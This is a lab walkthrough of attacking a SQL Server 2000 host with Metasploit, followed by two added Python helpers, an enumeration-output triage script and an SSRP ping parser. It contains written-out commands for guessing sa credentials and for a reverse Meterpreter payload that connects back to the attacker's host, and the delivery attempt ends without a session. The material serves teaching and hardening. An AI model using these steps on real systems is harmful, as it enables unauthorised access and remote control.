Attacking MSSQL from BT5 (BackTrack 5)

Walkthrough against one SQL Server 2000 host, 192.168.1.142, from a BackTrack 5 box at 192.168.1.11: discovery with mssql_ping, credential guessing with mssql_login, post-authentication enumeration with mssql_enum, an attempt at code execution with mssql_payload, and the same discovery repeated with nmap's ms-sql-info script.

mssql_ping (auxiliary/scanner/mssql/mssql_ping): discovery. The module sends a SQL Server Resolution Protocol request to UDP 1434, the SQL Server resolution (Browser) service, and lists every instance that answers together with its TCP port and named pipe. No credentials are needed; the USERNAME/PASSWORD options come from the shared MSSQL mixin and are not used for the ping itself:

msf  auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf  auxiliary(mssql_ping) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf  auxiliary(mssql_ping) > run

[*] SQL Server information for 192.168.1.142:
[*]    ServerName      = ROOT-9743DD32E3
[*]    InstanceName    = MSSQLSERVER
[*]    IsClustered     = No
[*]    Version         = 8.00.194
[*]    tcp             = 1433
[*]    np              = \\ROOT-9743DD32E3\pipe\sql\query
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Note the Version field. 8.00.194 is the SQL Server 2000 RTM build, yet both mssql_enum and nmap further down report 8.00.2039, which is SP4. The resolution service is good for finding instances, ports and pipes; do not use its version string to judge patch level.

mssql_login (auxiliary/scanner/mssql/mssql_login): credential guessing over TCP 1433. With the defaults shown below (USERNAME sa, no wordlists, BLANK_PASSWORDS and USER_AS_PASS both true) the module makes exactly two attempts, sa with an empty password and sa/sa, which is why the log says [1/2]. The first attempt succeeds:

msf  auxiliary(mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         true             no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
   VERBOSE              true             yes       Whether to print output for all attempts

msf  auxiliary(mssql_login) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf  auxiliary(mssql_login) > run

[*] 192.168.1.142:1433 - MSSQL - Starting authentication scanner.
[*] 192.168.1.142:1433 MSSQL - [1/2] - Trying username:'sa' with password:''
[+] 192.168.1.142:1433 - MSSQL - successful login 'sa' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

mssql_enum (auxiliary/admin/mssql/mssql_enum): post-authentication enumeration. It logs in with the recovered credentials (USERNAME sa and an empty PASSWORD are the defaults, so nothing more needs setting) and queries the server for its version, configuration options, databases and file paths, logins, weak passwords, procedures executable by public, instances and the service account:

msf  auxiliary(mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf  auxiliary(mssql_enum) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf  auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]     Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
[*]             May  3 2005 23:18:38 
[*]             Copyright (c) 1988-2003 Microsoft Corporation
[*]             Enterprise Evaluation Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Database Mail XPs is Enabled
[*]     Ole Automation Procedures is Enabled
[*] Databases on the server:
[*]     Database name:master
[*]     Database Files for master:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf
[*]     Database name:tempdb
[*]     Database Files for tempdb:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\templog.ldf
[*]     Database name:model
[*]     Database Files for model:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\modellog.ldf
[*]     Database name:msdb
[*]     Database Files for msdb:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdblog.ldf
[*]     Database name:pubs
[*]     Database Files for pubs:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf
[*]     Database name:Northwind
[*]     Database Files for Northwind:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.ldf
[*]     Database name:fasttrack
[*]     Database Files for fasttrack:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Data.MDF
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Log.LDF
[*] System Logins on this Server:
[*]     sa
[*]     BUILTIN\Administrators
[*] System Admin Logins on this Server:
[*]     BUILTIN\Administrators
[*]     sa
[*] Windows Logins on this Server:
[*]     No Windows logins found!
[*] Windows Groups that can logins on this Server:
[*]     BUILTIN\Administrators
[*] Accounts with Username and Password being the same:
[*]     No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*]     sa
[*] Stored Procedures with Public Execute Permission found:
[*]     xp_getfiledetails
[*]     xp_dirtree
[*]     xp_fixeddrives
[*]     xp_getnetname
[*]     sp_replsetoriginator
[*]     sp_replincrementlsn
[*]     xp_enum_activescriptengines
[*]     sp_repldone
[*]     xp_fileexist
[*]     sp_repltrans
[*]     xp_ntsec_enumdomains
[*]     sp_replcounters
[*]     sp_replcmds
[*]     sp_replpostschema
[*]     sp_replsetsyncstatus
[*]     sp_getbindtoken
[*]     sp_createorphan
[*]     xp_unc_to_drive
[*]     sp_droporphans
[*]     xp_MSplatform
[*]     sp_xml_preparedocument
[*]     sp_xml_removedocument
[*]     xp_IsNTAdmin
[*]     xp_MSnt2000
[*]     xp_grantlogin
[*]     xp_revokelogin
[*]     xp_MSLocalSystem
[*]     sp_prepexec
[*]     sp_prepexecrpc
[*]     sp_unprepare
[*]     xp_mergexpusage
[*]     xp_showlineage
[*]     sp_reset_connection
[*]     sp_getschemalock
[*]     xp_mapdown_bitmap
[*]     sp_releaseschemalock
[*]     sp_resyncprepare
[*]     sp_resyncexecute
[*]     xp_showcolv
[*]     sp_resyncexecutesql
[*]     sp_resyncuniquetable
[*]     sp_refreshview
[*]     sp_replsendtoqueue
[*]     sp_replwritetovarbin
[*]     xp_qv
[*]     xp_regread
[*] Instances found on this server:
[*]     MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*]     LocalSystem
[*] Auxiliary module execution completed

What this output establishes, in order of importance: sa is a sysadmin with an empty password; xp_cmdshell is enabled, so any sysadmin can run OS commands; the service runs as LocalSystem, so those commands run as SYSTEM; Ole Automation Procedures (sp_OACreate and related procedures) are enabled as a second route to code execution; C2 auditing is off; and a long list of extended procedures, including xp_regread, xp_dirtree, xp_fileexist and xp_fixeddrives, is executable by public, that is, by every login. xp_dirtree and xp_fileexist take UNC paths, so even an unprivileged login can make the LocalSystem service authenticate to an attacker's SMB share. The build is SQL Server 2000 SP4 on Windows XP SP3, both out of support. The fixes follow directly: give sa a strong password, run the service under a dedicated low-privileged account, turn off xp_cmdshell and Ole Automation unless something needs them, and revoke public execute on the xp_* procedures.
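As an added example (not part of the original post and not Metasploit code), the script below parses the text that mssql_enum prints and turns it into severity-ordered findings, including the one chain the post actually walks: empty sysadmin password, xp_cmdshell, LocalSystem. Which conditions count as findings and how severe they are is this example's own judgement; SAMPLE_OUTPUT is a re-typed excerpt of the run above so the script works offline, and the RISKY_PUBLIC_XPS annotations are the example's, not something the module emits.

```python
"""Triage helper for mssql_enum output (added example, not Metasploit code).

Parses the '[*]' lines auxiliary/admin/mssql/mssql_enum prints and emits
findings. Severities and the list of risky procedures are this example's
own choices. SAMPLE_OUTPUT is a re-typed excerpt of the post's run.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Extended procedures worth flagging when 'public' (every login) can run them.
RISKY_PUBLIC_XPS = {
    "xp_regread": "reads registry values visible to the service account",
    "xp_dirtree": "accepts a UNC path, so any login can make the service "
                  "account authenticate to an attacker's SMB share",
    "xp_fileexist": "accepts a UNC path (same coercion as xp_dirtree)",
    "xp_fixeddrives": "enumerates local drives",
}
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass(frozen=True)
class Finding:
    severity: str
    title: str


def parse_enum_output(text: str) -> dict[str, list[str]]:
    """Group the '[*]' lines into {section heading: [items]}.

    A lightly indented line ending in ':' opens a section; more deeply
    indented lines are its items (nested 'Database Files for x:' headings
    simply become items of 'Databases on the server:').
    """
    sections: dict[str, list[str]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("[*]"):
            continue
        line = raw[3:]
        body = line.strip()
        indent = len(line) - len(line.lstrip())
        if not body:
            continue
        if indent <= 1 and body.endswith(":"):
            current = body
            sections[current] = []
        elif indent > 1 and current is not None:
            sections[current].append(body)
    return sections


def triage(text: str) -> list[Finding]:
    """Turn parsed enumeration output into severity-ordered findings."""
    s = parse_enum_output(text)
    config = set(s.get("Configuration Parameters:", []))
    sysadmins = set(s.get("System Admin Logins on this Server:", []))
    empty_pw = [a for a in s.get("Accounts with empty password:", [])
                if not a.startswith("No ")]
    public_xps = set(s.get("Stored Procedures with Public Execute Permission found:", []))
    svc = next((item for head, items in s.items()
                if "running under the privilege of" in head for item in items), None)
    version = " ".join(s.get("Version:", [])[:1])
    out: list[Finding] = []

    for acct in empty_pw:
        sev = "high" if acct in sysadmins else "medium"
        out.append(Finding(sev, f"login '{acct}' has an empty password"))
    if "xp_cmdshell is Enabled" in config:
        out.append(Finding("high", "xp_cmdshell is enabled: sysadmins get OS command execution"))
    if "Ole Automation Procedures is Enabled" in config:
        out.append(Finding("medium", "Ole Automation Procedures enabled: sp_OACreate is a second route to code execution"))
    if "C2 Audit Mode is Not Enabled" in config:
        out.append(Finding("low", "C2 audit mode off: no built-in audit trail"))
    if svc == "LocalSystem":
        out.append(Finding("high", "service runs as LocalSystem: anything run via xp_cmdshell is SYSTEM"))
    for xp in sorted(public_xps & set(RISKY_PUBLIC_XPS)):
        out.append(Finding("medium", f"{xp} executable by public: {RISKY_PUBLIC_XPS[xp]}"))
    m = re.search(r"Microsoft SQL Server\s+(\d{4})\s+-\s+(\d+\.\d+\.\d+)", version)
    if m and m.group(1) == "2000":
        out.append(Finding("high", f"SQL Server 2000 build {m.group(2)}: out of support since April 2013"))
    # The chain the post actually walks, reported as one finding.
    if (any(a in sysadmins for a in empty_pw) and "xp_cmdshell is Enabled" in config
            and svc == "LocalSystem"):
        out.insert(0, Finding("critical", "empty sysadmin password -> xp_cmdshell -> LocalSystem: "
                                          "anyone who can reach 1433 is SYSTEM on the host"))
    return sorted(out, key=lambda f: SEVERITY_ORDER[f.severity])  # stable sort


# Constructed excerpt of the post's mssql_enum output, re-typed for the test.
SAMPLE_OUTPUT = r"""
[*] Running MS SQL Server Enumeration...
[*] Version:
[*]     Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
[*]             Enterprise Evaluation Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     Ole Automation Procedures is Enabled
[*] System Admin Logins on this Server:
[*]     BUILTIN\Administrators
[*]     sa
[*] Accounts with empty password:
[*]     sa
[*] Stored Procedures with Public Execute Permission found:
[*]     xp_dirtree
[*]     sp_reset_connection
[*]     xp_regread
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*]     LocalSystem
[*] Auxiliary module execution completed
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_OUTPUT):
        print(f"[{f.severity:8}] {f.title}")
```

Pipe a saved msfconsole log in place of SAMPLE_OUTPUT to triage a real run; the parser only looks at the `[*]` lines, so the rest of the console transcript is ignored.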

mssql_payload (exploit/windows/mssql/mssql_payload): code execution. The module authenticates with the same sa credentials and uses xp_cmdshell to write a payload executable onto the target and launch it. With METHOD cmd the executable is pushed through cmd.exe one chunk per xp_cmdshell call, which is what the Command Stager progress lines are counting. The payload is a reverse Meterpreter, so LHOST must be the attacker's address:

msf  exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(mssql_payload) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf  exploit(mssql_payload) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.11:4444 
[*] Command Stager progress -   1.47% done (1499/102246 bytes)
[*] Command Stager progress -   2.93% done (2998/102246 bytes)
[*] Command Stager progress -   4.40% done (4497/102246 bytes)
[*] Command Stager progress -   5.86% done (5996/102246 bytes)
[*] Command Stager progress -   7.33% done (7495/102246 bytes)
[*] Command Stager progress -   8.80% done (8994/102246 bytes)
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  11.73% done (11992/102246 bytes)
[*] Command Stager progress -  13.19% done (13491/102246 bytes)
[*] Command Stager progress -  14.66% done (14990/102246 bytes)
[*] Command Stager progress -  16.13% done (16489/102246 bytes)
[*] Command Stager progress -  17.59% done (17988/102246 bytes)
[*] Command Stager progress -  19.06% done (19487/102246 bytes)
[*] Command Stager progress -  20.53% done (20986/102246 bytes)
[*] Command Stager progress -  21.99% done (22485/102246 bytes)
[*] Command Stager progress -  23.46% done (23984/102246 bytes)
[*] Command Stager progress -  24.92% done (25483/102246 bytes)
[*] Command Stager progress -  26.39% done (26982/102246 bytes)
[*] Command Stager progress -  27.86% done (28481/102246 bytes)
[*] Command Stager progress -  29.32% done (29980/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  32.25% done (32978/102246 bytes)
[*] Command Stager progress -  33.72% done (34477/102246 bytes)
[*] Command Stager progress -  35.19% done (35976/102246 bytes)
[*] Command Stager progress -  36.65% done (37475/102246 bytes)
[*] Command Stager progress -  38.12% done (38974/102246 bytes)
[*] Command Stager progress -  39.58% done (40473/102246 bytes)
[*] Command Stager progress -  41.05% done (41972/102246 bytes)
[*] Command Stager progress -  42.52% done (43471/102246 bytes)
[*] Command Stager progress -  43.98% done (44970/102246 bytes)
[*] Command Stager progress -  45.45% done (46469/102246 bytes)
[*] Command Stager progress -  46.91% done (47968/102246 bytes)
[*] Command Stager progress -  48.38% done (49467/102246 bytes)
[*] Command Stager progress -  49.85% done (50966/102246 bytes)
[*] Command Stager progress -  51.31% done (52465/102246 bytes)
[*] Command Stager progress -  52.78% done (53964/102246 bytes)
[*] Command Stager progress -  54.24% done (55463/102246 bytes)
[*] Command Stager progress -  55.71% done (56962/102246 bytes)
[*] Command Stager progress -  57.18% done (58461/102246 bytes)
[*] Command Stager progress -  58.64% done (59960/102246 bytes)
[*] Command Stager progress -  60.11% done (61459/102246 bytes)
[*] Command Stager progress -  61.58% done (62958/102246 bytes)
[*] Command Stager progress -  63.04% done (64457/102246 bytes)
[*] Command Stager progress -  64.51% done (65956/102246 bytes)
[*] Command Stager progress -  65.97% done (67455/102246 bytes)
[*] Command Stager progress -  67.44% done (68954/102246 bytes)
[*] Command Stager progress -  68.91% done (70453/102246 bytes)
[*] Command Stager progress -  70.37% done (71952/102246 bytes)
[*] Command Stager progress -  71.84% done (73451/102246 bytes)
[*] Command Stager progress -  73.30% done (74950/102246 bytes)
[*] Command Stager progress -  74.77% done (76449/102246 bytes)
[*] Command Stager progress -  76.24% done (77948/102246 bytes)
[*] Command Stager progress -  77.70% done (79447/102246 bytes)
[*] Command Stager progress -  79.17% done (80946/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress -  82.10% done (83944/102246 bytes)
[*] Command Stager progress -  83.57% done (85443/102246 bytes)
[*] Command Stager progress -  85.03% done (86942/102246 bytes)
[*] Command Stager progress -  86.50% done (88441/102246 bytes)
[*] Command Stager progress -  87.96% done (89940/102246 bytes)
[*] Command Stager progress -  89.43% done (91439/102246 bytes)
[*] Command Stager progress -  90.90% done (92938/102246 bytes)
[*] Command Stager progress -  92.36% done (94437/102246 bytes)
[*] Command Stager progress -  93.83% done (95936/102246 bytes)
[*] Command Stager progress -  95.29% done (97435/102246 bytes)
[*] Command Stager progress -  96.76% done (98934/102246 bytes)
[*] Command Stager progress -  98.19% done (100400/102246 bytes)
[*] Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.

The stager ran to completion but nothing connected back, so the post ends without a shell. Things to check before rerunning: that xp_cmdshell really executes and returns output (run something harmless such as hostname through auxiliary/admin/mssql/mssql_exec), that the target can reach the listener on 192.168.1.11:4444 (attacker-side firewall, VM network mode), and that no antivirus on the target removed the dropped executable. METHOD ps is not a fallback here, since Windows XP SP3 does not ship with PowerShell. If a session does come back it runs as LocalSystem, because that is the account the enumeration showed the service using.

nmap: the same discovery without Metasploit. The ms-sql-info script queries the resolution service on UDP 1434 and then probes the instance port itself for version information, which is why it reports the real build, 8.00.2039.00 (SP4), where mssql_ping only saw 8.00.194:

root@root:~# nmap -sU --script=ms-sql-info 192.168.1.142

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2013-05-14 19:35 EDT
Nmap scan report for 192.168.1.142
Host is up (0.00065s latency).
Not shown: 992 closed ports
PORT     STATE         SERVICE
123/udp  open          ntp
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
445/udp  open|filtered microsoft-ds
500/udp  open|filtered isakmp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:F1:31:D2 (VMware)

Host script results:
| ms-sql-info: 
|   Windows server name: ROOT-9743DD32E3
|   [192.168.1.142\MSSQLSERVER]
|     Instance name: MSSQLSERVER
|     Version: Microsoft SQL Server 2000 SP4
|       Version number: 8.00.2039.00
|       Product: Microsoft SQL Server 2000
|       Service pack level: SP4
|       Post-SP patches applied: No
|     TCP port: 1433
|     Named pipe: \\192.168.1.142\pipe\sql\query
|_    Clustered: No

Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
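Both mssql_ping and nmap's ms-sql-info start with the same exchange: one request byte to UDP 1434 and one datagram back describing every instance. As an added example (not part of the original post, and not Metasploit's or Nmap's code), the client below performs that exchange and parses the reply; the response format follows [MS-SQLR], and SAMPLE_RESPONSE is constructed from the values the post's server returned so the parser can be exercised offline.

```python
"""SQL Server Resolution Protocol (SSRP) ping and reply parser.

Added example for this page; not Metasploit's mssql_ping or Nmap's
ms-sql-info code. One CLNT_UCAST_EX byte goes to UDP 1434 and one SVR_RESP
datagram comes back listing every instance. SAMPLE_RESPONSE is constructed
from the values the post shows.
"""
from __future__ import annotations

import socket
import sys

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x02"  # "describe every instance on this host" (MS-SQLR 2.2.2)
SVR_RESP = 0x05          # first byte of every server reply (MS-SQLR 2.2.5)


def parse_ssrp_response(data: bytes) -> list[dict[str, str]]:
    """Decode one SVR_RESP datagram into a list of per-instance dicts.

    Layout: 0x05, a 2-byte little-endian length, then RESP_DATA: a
    ';'-separated sequence of key;value pairs, each instance closed by ';;'.
    """
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP server response")
    size = int.from_bytes(data[1:3], "little")
    if size > len(data) - 3:
        raise ValueError("truncated SSRP response")
    body = data[3:3 + size].decode("latin-1")
    instances = []
    for record in body.split(";;"):
        if not record:
            continue
        tokens = record.split(";")
        if len(tokens) % 2:
            raise ValueError(f"odd token count in record: {record!r}")
        instances.append(dict(zip(tokens[0::2], tokens[1::2])))
    return instances


def build_response(*instances: dict[str, str]) -> bytes:
    """Encode instances the way a server would; used to build SAMPLE_RESPONSE."""
    body = "".join(
        ";".join(f"{k};{v}" for k, v in inst.items()) + ";;" for inst in instances
    ).encode("latin-1")
    return bytes([SVR_RESP]) + len(body).to_bytes(2, "little") + body


def ssrp_ping(host: str, timeout: float = 2.0) -> list[dict[str, str]]:
    """Send the ping and parse the reply (what mssql_ping and ms-sql-info do)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        data, _ = sock.recvfrom(65535)
    return parse_ssrp_response(data)


# Constructed reply carrying the instance the post found.
SAMPLE_INSTANCE = {
    "ServerName": "ROOT-9743DD32E3",
    "InstanceName": "MSSQLSERVER",
    "IsClustered": "No",
    "Version": "8.00.194",
    "tcp": "1433",
    "np": r"\\ROOT-9743DD32E3\pipe\sql\query",
}
SAMPLE_RESPONSE = build_response(SAMPLE_INSTANCE)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    found = ssrp_ping(target) if target else parse_ssrp_response(SAMPLE_RESPONSE)
    for inst in found:
        # Version here is what the resolution service reports, not the patched
        # engine build (the post's server says 8.00.194 but is actually SP4).
        print(f"{inst.get('ServerName')}\\{inst.get('InstanceName')}: "
              f"tcp={inst.get('tcp')} np={inst.get('np')} version={inst.get('Version')}")
```

Run it with a host argument to query a live server, or with none to decode the constructed sample. The parser accepts multiple instances in one reply, which is what a host with several named instances returns, and rejects datagrams that are not SSRP replies or that are shorter than their own length field claims.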
